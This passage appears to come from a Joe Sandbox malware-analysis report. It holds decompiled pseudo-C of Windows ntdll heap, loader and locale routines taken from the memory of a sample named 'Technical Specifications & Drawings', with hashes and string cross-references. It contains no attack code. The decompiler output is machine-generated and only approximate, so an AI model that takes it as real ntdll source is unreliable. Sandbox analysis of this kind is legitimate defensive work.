                                                  								_t89 = _t88 & 0xffffff00 | ( *0x1898720 & 0x00000001) == 0x00000000;
                                                  								__eflags = _t89 & _t121;
                                                  								if((_t89 & _t121) != 0) {
                                                  									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                                  								}
                                                  							}
                                                  						}
                                                  						_t85 =  *(_t111 + 0x14);
                                                  						if(_t85 >= 0x7f000) {
                                                  							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                                  						}
                                                  						_t86 = _a16;
                                                  						 *_t86 = _t141 - _a12 >> 3;
                                                  						return _t86;
                                                  					} else {
                                                  						_t90 = E017CB8E4(_t135);
                                                  						_t123 =  *((intOrPtr*)(_t90 + 4));
                                                  						if( *_t123 != _t90) {
                                                  							_push(_t123);
                                                  							_push( *_t123);
                                                  							E0186A80D(0, 0xd, _t90, 0);
                                                  						} else {
                                                  							 *_t111 = _t90;
                                                  							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                                  							 *_t123 = _t111;
                                                  							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                                  						}
                                                  						_t139 =  *(_t140 + 0xb8);
                                                  						if(_t139 != 0) {
                                                  							_t93 =  *(_t111 + 0x14) >> 0xc;
                                                  							__eflags = _t93;
                                                  							while(1) {
                                                  								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                                  								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                                  									break;
                                                  								}
                                                  								_t126 =  *_t139;
                                                  								__eflags = _t126;
                                                  								if(_t126 != 0) {
                                                  									_t139 = _t126;
                                                  									continue;
                                                  								}
                                                  								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                  								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                  								break;
                                                  							}
                                                  							E017CE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                                  						}
                                                  						goto L12;
                                                  					}
                                                  				}
                                                  			}































                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-1334570610
                                                  • Opcode ID: d2499cc7362a29f7d634c61217d4b048bf201b9f2848feadcaa867dbf05dd966
                                                  • Instruction ID: b9845505aaaabc7d1dfc399e68a980511b77c4908204aa2ad42fb5752836664f
                                                  • Opcode Fuzzy Hash: d2499cc7362a29f7d634c61217d4b048bf201b9f2848feadcaa867dbf05dd966
                                                  • Instruction Fuzzy Hash: 1861CF71640241DFDB29DF28C486B6AFBE5FF44B44F1885AEF8498B246D730E981CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E017B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                  				char _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				char _v24;
                                                  				signed int _t73;
                                                  				void* _t77;
                                                  				char* _t82;
                                                  				char* _t87;
                                                  				signed char* _t97;
                                                  				signed char _t102;
                                                  				intOrPtr _t107;
                                                  				signed char* _t108;
                                                  				intOrPtr _t112;
                                                  				intOrPtr _t124;
                                                  				intOrPtr _t125;
                                                  				intOrPtr _t126;
                                                  
                                                  				_t107 = __edx;
                                                  				_v12 = __ecx;
                                                  				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                  				_t124 = 0;
                                                  				_v20 = __edx;
                                                  				if(E017BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                  					_t112 = _v8;
                                                  				} else {
                                                  					_t112 = 0;
                                                  					_v8 = 0;
                                                  				}
                                                  				if(_t112 != 0) {
                                                  					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                  						_t124 = 0xc000007b;
                                                  						goto L8;
                                                  					}
                                                  					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                  					 *(_t125 + 0x34) = _t73;
                                                  					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                  						goto L3;
                                                  					}
                                                  					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                  					_t124 = E017AC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                  					if(_t124 < 0) {
                                                  						goto L8;
                                                  					} else {
                                                  						goto L3;
                                                  					}
                                                  				} else {
                                                  					L3:
                                                  					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                  						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                  						L8:
                                                  						return _t124;
                                                  					}
                                                  					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                  						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                  							goto L5;
                                                  						}
                                                  						_t102 =  *0x1895780; // 0x0
                                                  						if((_t102 & 0x00000003) != 0) {
                                                  							E01825510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                  							_t102 =  *0x1895780; // 0x0
                                                  						}
                                                  						if((_t102 & 0x00000010) != 0) {
                                                  							asm("int3");
                                                  						}
                                                  						_t124 = 0xc0000428;
                                                  						goto L8;
                                                  					}
                                                  					L5:
                                                  					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                  						goto L8;
                                                  					}
                                                  					_t77 = _a4 - 0x40000003;
                                                  					if(_t77 == 0 || _t77 == 0x33) {
                                                  						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                  						if(E017C7D50() != 0) {
                                                  							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  						} else {
                                                  							_t82 = 0x7ffe0384;
                                                  						}
                                                  						_t108 = 0x7ffe0385;
                                                  						if( *_t82 != 0) {
                                                  							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                  								if(E017C7D50() == 0) {
                                                  									_t97 = 0x7ffe0385;
                                                  								} else {
                                                  									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                  								}
                                                  								if(( *_t97 & 0x00000020) != 0) {
                                                  									E01827016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                  								}
                                                  							}
                                                  						}
                                                  						if(_a4 != 0x40000003) {
                                                  							L14:
                                                  							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                  							if(E017C7D50() != 0) {
                                                  								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  							} else {
                                                  								_t87 = 0x7ffe0384;
                                                  							}
                                                  							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                  								if(E017C7D50() != 0) {
                                                  									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                  								}
                                                  								if(( *_t108 & 0x00000020) != 0) {
                                                  									E01827016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                  								}
                                                  							}
                                                  							goto L8;
                                                  						} else {
                                                  							_v16 = _t125 + 0x24;
                                                  							_t124 = E017DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                  							if(_t124 < 0) {
                                                  								E017AB1E1(_t124, 0x1490, 0, _v16);
                                                  								goto L8;
                                                  							}
                                                  							goto L14;
                                                  						}
                                                  					} else {
                                                  						goto L8;
                                                  					}
                                                  				}
                                                  			}





















                                                  Strings
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 01809891
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 018098A2
                                                  • LdrpCompleteMapModule, xrefs: 01809898
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: 21221e73558f043fc1a61975e380086d9e0368fa8ab255208350f34e0824ff82
                                                  • Instruction ID: aee34e6c0e18deeae0fdf883fcad0d23d3041c7da1464c4abf79c4037decf711
                                                  • Opcode Fuzzy Hash: 21221e73558f043fc1a61975e380086d9e0368fa8ab255208350f34e0824ff82
                                                  • Instruction Fuzzy Hash: 2251F531A00745DBE72ACB5CC9C4BA9FBA4AF88714F040699E955DB7D2D734EE00C750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 64%
                                                  			E018523E3(signed int __ecx, unsigned int __edx) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t42;
                                                  				char _t43;
                                                  				signed short _t44;
                                                  				signed short _t48;
                                                  				signed char _t51;
                                                  				signed short _t52;
                                                  				intOrPtr _t54;
                                                  				signed short _t64;
                                                  				signed short _t66;
                                                  				intOrPtr _t69;
                                                  				signed short _t73;
                                                  				signed short _t76;
                                                  				signed short _t77;
                                                  				signed short _t79;
                                                  				void* _t83;
                                                  				signed int _t84;
                                                  				signed int _t85;
                                                  				signed char _t94;
                                                  				unsigned int _t99;
                                                  				unsigned int _t104;
                                                  				signed int _t108;
                                                  				void* _t110;
                                                  				void* _t111;
                                                  				unsigned int _t114;
                                                  
                                                  				_t84 = __ecx;
                                                  				_push(__ecx);
                                                  				_t114 = __edx;
                                                  				_t42 =  *((intOrPtr*)(__edx + 7));
                                                  				if(_t42 == 1) {
                                                  					L49:
                                                  					_t43 = 1;
                                                  					L50:
                                                  					return _t43;
                                                  				}
                                                  				if(_t42 != 4) {
                                                  					if(_t42 >= 0) {
                                                  						if( *(__ecx + 0x4c) == 0) {
                                                  							_t44 =  *__edx & 0x0000ffff;
                                                  						} else {
                                                  							_t73 =  *__edx;
                                                  							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                                  								_t73 = _t73 ^  *(__ecx + 0x50);
                                                  							}
                                                  							_t44 = _t73 & 0x0000ffff;
                                                  						}
                                                  					} else {
                                                  						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x189874c ^ __ecx;
                                                  						if(_t104 == 0) {
                                                  							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                                  						} else {
                                                  							_t76 = 0;
                                                  						}
                                                  						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                                  					}
                                                  					_t94 =  *((intOrPtr*)(_t114 + 7));
                                                  					_t108 = _t44 & 0xffff;
                                                  					if(_t94 != 5) {
                                                  						if((_t94 & 0x00000040) == 0) {
                                                  							if((_t94 & 0x0000003f) == 0x3f) {
                                                  								if(_t94 >= 0) {
                                                  									if( *(_t84 + 0x4c) == 0) {
                                                  										_t48 =  *_t114 & 0x0000ffff;
                                                  									} else {
                                                  										_t66 =  *_t114;
                                                  										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                                  											_t66 = _t66 ^  *(_t84 + 0x50);
                                                  										}
                                                  										_t48 = _t66 & 0x0000ffff;
                                                  									}
                                                  								} else {
                                                  									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x189874c ^ _t84;
                                                  									if(_t99 == 0) {
                                                  										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                                  									} else {
                                                  										_t69 = 0;
                                                  									}
                                                  									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                                  								}
                                                  								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                                  							} else {
                                                  								_t85 = _t94 & 0x3f;
                                                  							}
                                                  						} else {
                                                  							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                                  						}
                                                  					} else {
                                                  						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                                  					}
                                                  					_t110 = (_t108 << 3) - _t85;
                                                  				} else {
                                                  					if( *(__ecx + 0x4c) == 0) {
                                                  						_t77 =  *__edx & 0x0000ffff;
                                                  					} else {
                                                  						_t79 =  *__edx;
                                                  						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                                  							_t79 = _t79 ^  *(__ecx + 0x50);
                                                  						}
                                                  						_t77 = _t79 & 0x0000ffff;
                                                  					}
                                                  					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                                  				}
                                                  				_t51 =  *((intOrPtr*)(_t114 + 7));
                                                  				if(_t51 != 5) {
                                                  					if((_t51 & 0x00000040) == 0) {
                                                  						_t52 = 0;
                                                  						goto L42;
                                                  					}
                                                  					_t64 = _t51 & 0x3f;
                                                  					goto L38;
                                                  				} else {
                                                  					_t64 =  *(_t114 + 6) & 0x000000ff;
                                                  					L38:
                                                  					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                                  					L42:
                                                  					_t35 = _t114 + 8; // -16
                                                  					_t111 = _t110 + (_t52 & 0x0000ffff);
                                                  					_t83 = _t35 + _t111;
                                                  					_t54 = E017FD4F0(_t83, 0x1786c58, 8);
                                                  					_v8 = _t54;
                                                  					if(_t54 == 8) {
                                                  						goto L49;
                                                  					}
                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  						_push("HEAP: ");
                                                  						E017AB150();
                                                  					} else {
                                                  						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  					}
                                                  					_push(_t111);
                                                  					_push(_v8 + _t83);
                                                  					E017AB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                                  					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                  						 *0x1896378 = 1;
                                                  						asm("int3");
                                                  						 *0x1896378 = 0;
                                                  					}
                                                  					_t43 = 0;
                                                  					goto L50;
                                                  				}
                                                  			}





























                                                  Strings
                                                  • HEAP: , xrefs: 0185255C
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0185256F
                                                  • HEAP[%wZ]: , xrefs: 0185254F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  • Opcode ID: 01c225d1d02f83481cbb088c9c7d062f955c3290cd5a3bb413984cebb20202aa
                                                  • Instruction ID: 7573d19a88452ba79bad3c020f2514a73c1d5a103836779f716fd4f21f84a852
                                                  • Opcode Fuzzy Hash: 01c225d1d02f83481cbb088c9c7d062f955c3290cd5a3bb413984cebb20202aa
                                                  • Instruction Fuzzy Hash: 8551F335100254CAE7F4CA2EC894772BFF3EB44748F544899EDC2CB285DA35EA46DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E017AE620(void* __ecx, short* __edx, short* _a4) {
                                                  				char _v16;
                                                  				char _v20;
                                                  				intOrPtr _v24;
                                                  				char* _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				char _v44;
                                                  				signed int _v48;
                                                  				intOrPtr _v52;
                                                  				void* _v56;
                                                  				void* _v60;
                                                  				char _v64;
                                                  				void* _v68;
                                                  				void* _v76;
                                                  				void* _v84;
                                                  				signed int _t59;
                                                  				signed int _t74;
                                                  				signed short* _t75;
                                                  				signed int _t76;
                                                  				signed short* _t78;
                                                  				signed int _t83;
                                                  				short* _t93;
                                                  				signed short* _t94;
                                                  				short* _t96;
                                                  				void* _t97;
                                                  				signed int _t99;
                                                  				void* _t101;
                                                  				void* _t102;
                                                  
                                                  				_t80 = __ecx;
                                                  				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                  				_t96 = __edx;
                                                  				_v44 = __edx;
                                                  				_t78 = 0;
                                                  				_v56 = 0;
                                                  				if(__ecx == 0 || __edx == 0) {
                                                  					L28:
                                                  					_t97 = 0xc000000d;
                                                  				} else {
                                                  					_t93 = _a4;
                                                  					if(_t93 == 0) {
                                                  						goto L28;
                                                  					}
                                                  					_t78 = E017AF358(__ecx, 0xac);
                                                  					if(_t78 == 0) {
                                                  						_t97 = 0xc0000017;
                                                  						L6:
                                                  						if(_v56 != 0) {
                                                  							_push(_v56);
                                                  							E017E95D0();
                                                  						}
                                                  						if(_t78 != 0) {
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                  						}
                                                  						return _t97;
                                                  					}
                                                  					E017EFA60(_t78, 0, 0x158);
                                                  					_v48 = _v48 & 0x00000000;
                                                  					_t102 = _t101 + 0xc;
                                                  					 *_t96 = 0;
                                                  					 *_t93 = 0;
                                                  					E017EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                  					_v36 = 0x18;
                                                  					_v28 =  &_v44;
                                                  					_v64 = 0;
                                                  					_push( &_v36);
                                                  					_push(0x20019);
                                                  					_v32 = 0;
                                                  					_push( &_v64);
                                                  					_v24 = 0x40;
                                                  					_v20 = 0;
                                                  					_v16 = 0;
                                                  					_t97 = E017E9600();
                                                  					if(_t97 < 0) {
                                                  						goto L6;
                                                  					}
                                                  					E017EBB40(0,  &_v36, L"InstallLanguageFallback");
                                                  					_push(0);
                                                  					_v48 = 4;
                                                  					_t97 = L017AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                  					if(_t97 >= 0) {
                                                  						if(_v52 != 1) {
                                                  							L17:
                                                  							_t97 = 0xc0000001;
                                                  							goto L6;
                                                  						}
                                                  						_t59 =  *_t78 & 0x0000ffff;
                                                  						_t94 = _t78;
                                                  						_t83 = _t59;
                                                  						if(_t59 == 0) {
                                                  							L19:
                                                  							if(_t83 == 0) {
                                                  								L23:
                                                  								E017EBB40(_t83, _t102 + 0x24, _t78);
                                                  								if(L017B43C0( &_v48,  &_v64) == 0) {
                                                  									goto L17;
                                                  								}
                                                  								_t84 = _v48;
                                                  								 *_v48 = _v56;
                                                  								if( *_t94 != 0) {
                                                  									E017EBB40(_t84, _t102 + 0x24, _t94);
                                                  									if(L017B43C0( &_v48,  &_v64) != 0) {
                                                  										 *_a4 = _v56;
                                                  									} else {
                                                  										_t97 = 0xc0000001;
                                                  										 *_v48 = 0;
                                                  									}
                                                  								}
                                                  								goto L6;
                                                  							}
                                                  							_t83 = _t83 & 0x0000ffff;
                                                  							while(_t83 == 0x20) {
                                                  								_t94 =  &(_t94[1]);
                                                  								_t74 =  *_t94 & 0x0000ffff;
                                                  								_t83 = _t74;
                                                  								if(_t74 != 0) {
                                                  									continue;
                                                  								}
                                                  								goto L23;
                                                  							}
                                                  							goto L23;
                                                  						} else {
                                                  							goto L14;
                                                  						}
                                                  						while(1) {
                                                  							L14:
                                                  							_t27 =  &(_t94[1]); // 0x2
                                                  							_t75 = _t27;
                                                  							if(_t83 == 0x2c) {
                                                  								break;
                                                  							}
                                                  							_t94 = _t75;
                                                  							_t76 =  *_t94 & 0x0000ffff;
                                                  							_t83 = _t76;
                                                  							if(_t76 != 0) {
                                                  								continue;
                                                  							}
                                                  							goto L23;
                                                  						}
                                                  						 *_t94 = 0;
                                                  						_t94 = _t75;
                                                  						_t83 =  *_t75 & 0x0000ffff;
                                                  						goto L19;
                                                  					}
                                                  				}
                                                  			}
































                                                  Strings
                                                  • InstallLanguageFallback, xrefs: 017AE6DB
                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 017AE68C
                                                  • @, xrefs: 017AE6C0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                  • API String ID: 0-1757540487
                                                  • Opcode ID: 9b9e924d7caf41ef72e965165a84f78ac2a12af0541c80530d594a70e72c0d2d
                                                  • Instruction ID: 2a36cd8cc6b2792d7f1ef65a31f5f5a25b610ead4f1788c675461987b3c87494
                                                  • Opcode Fuzzy Hash: 9b9e924d7caf41ef72e965165a84f78ac2a12af0541c80530d594a70e72c0d2d
                                                  • Instruction Fuzzy Hash: 8D51A6B15043469BD715DF24C884AABF7E8BF88714F45096EF985D7250FB34DA04CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 60%
                                                  			E017CB8E4(unsigned int __edx) {
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				intOrPtr* _t16;
                                                  				intOrPtr _t18;
                                                  				void* _t27;
                                                  				void* _t28;
                                                  				unsigned int _t30;
                                                  				intOrPtr* _t31;
                                                  				unsigned int _t38;
                                                  				void* _t39;
                                                  				unsigned int _t40;
                                                  
                                                  				_t40 = __edx;
                                                  				_t39 = _t28;
                                                  				if( *0x1898748 >= 1) {
                                                  					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                                  					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                                  						_t18 =  *[fs:0x30];
                                                  						__eflags =  *(_t18 + 0xc);
                                                  						if( *(_t18 + 0xc) == 0) {
                                                  							_push("HEAP: ");
                                                  							E017AB150();
                                                  						} else {
                                                  							E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  						}
                                                  						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                                  						E017AB150();
                                                  						__eflags =  *0x1897bc8;
                                                  						if(__eflags == 0) {
                                                  							E01862073(_t27, 1, _t39, __eflags);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t38 =  *(_t39 + 0xb8);
                                                  				if(_t38 != 0) {
                                                  					_t13 = _t40 >> 0xc;
                                                  					__eflags = _t13;
                                                  					while(1) {
                                                  						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                                  						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                                  							break;
                                                  						}
                                                  						_t30 =  *_t38;
                                                  						__eflags = _t30;
                                                  						if(_t30 != 0) {
                                                  							_t38 = _t30;
                                                  							continue;
                                                  						}
                                                  						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                  						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                  						break;
                                                  					}
                                                  					return E017CAB40(_t39, _t38, 0, _t13, _t40);
                                                  				} else {
                                                  					_t31 = _t39 + 0x8c;
                                                  					_t16 =  *_t31;
                                                  					while(_t31 != _t16) {
                                                  						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                                  						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                                  							return _t16;
                                                  						}
                                                  						_t16 =  *_t16;
                                                  					}
                                                  					return _t31;
                                                  				}
                                                  			}















                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-2558761708
                                                  • Opcode ID: 92b83d815111fae050483f3b4fe218e0bc665fdc0707ad7029544eb3adfa7a4b
                                                  • Instruction ID: d77df0fc054759d4db1ba0a25d6c69d8c00f5f5f753f3769061494b4251d24e1
                                                  • Opcode Fuzzy Hash: 92b83d815111fae050483f3b4fe218e0bc665fdc0707ad7029544eb3adfa7a4b
                                                  • Instruction Fuzzy Hash: BE11D031344102DFDB29DB1DC496B76F7A6EB90BA0F28816DF10ACB245D634E944CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0183FF60
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                  • API String ID: 3446177414-1911121157
                                                  • Opcode ID: 0915710a419bb21aae7d5aaa99b1567242af5ef8843c06bb3283ddba8ea9f9ca
                                                  • Instruction ID: 2ad6df9e4f6cf59a6a0a3bbb5f48893083052b9e0a53c43547440bd4bef61a54
                                                  • Opcode Fuzzy Hash: 0915710a419bb21aae7d5aaa99b1567242af5ef8843c06bb3283ddba8ea9f9ca
                                                  • Instruction Fuzzy Hash: 74110071910544EFDF22EB54C848F98BBB1FF48704F188058E609AB2A1CB389B44DBD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 60%
                                                  			E0186E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                  				signed int _v20;
                                                  				char _v24;
                                                  				signed int _v40;
                                                  				char _v44;
                                                  				intOrPtr _v48;
                                                  				signed int _v52;
                                                  				unsigned int _v56;
                                                  				char _v60;
                                                  				signed int _v64;
                                                  				char _v68;
                                                  				signed int _v72;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				char _t87;
                                                  				signed int _t90;
                                                  				signed int _t94;
                                                  				signed int _t100;
                                                  				intOrPtr* _t113;
                                                  				signed int _t122;
                                                  				void* _t132;
                                                  				void* _t135;
                                                  				signed int _t139;
                                                  				signed int* _t141;
                                                  				signed int _t146;
                                                  				signed int _t147;
                                                  				void* _t153;
                                                  				signed int _t155;
                                                  				signed int _t159;
                                                  				char _t166;
                                                  				void* _t172;
                                                  				void* _t176;
                                                  				signed int _t177;
                                                  				intOrPtr* _t179;
                                                  
                                                  				_t179 = __ecx;
                                                  				_v48 = __edx;
                                                  				_v68 = 0;
                                                  				_v72 = 0;
                                                  				_push(__ecx[1]);
                                                  				_push( *__ecx);
                                                  				_push(0);
                                                  				_t153 = 0x14;
                                                  				_t135 = _t153;
                                                  				_t132 = E0186BBBB(_t135, _t153);
                                                  				if(_t132 == 0) {
                                                  					_t166 = _v68;
                                                  					goto L43;
                                                  				} else {
                                                  					_t155 = 0;
                                                  					_v52 = 0;
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					_v56 = __ecx[1];
                                                  					if( *__ecx >> 8 < 2) {
                                                  						_t155 = 1;
                                                  						_v52 = 1;
                                                  					}
                                                  					_t139 = _a4;
                                                  					_t87 = (_t155 << 0xc) + _t139;
                                                  					_v60 = _t87;
                                                  					if(_t87 < _t139) {
                                                  						L11:
                                                  						_t166 = _v68;
                                                  						L12:
                                                  						if(_t132 != 0) {
                                                  							E0186BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                  						}
                                                  						L43:
                                                  						if(_v72 != 0) {
                                                  							_push( *((intOrPtr*)(_t179 + 4)));
                                                  							_push( *_t179);
                                                  							_push(0x8000);
                                                  							E0186AFDE( &_v72,  &_v60);
                                                  						}
                                                  						L46:
                                                  						return _t166;
                                                  					}
                                                  					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                  					asm("sbb edi, edi");
                                                  					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                  					if(_t90 != 0) {
                                                  						_push(0);
                                                  						_push(0x14);
                                                  						_push( &_v44);
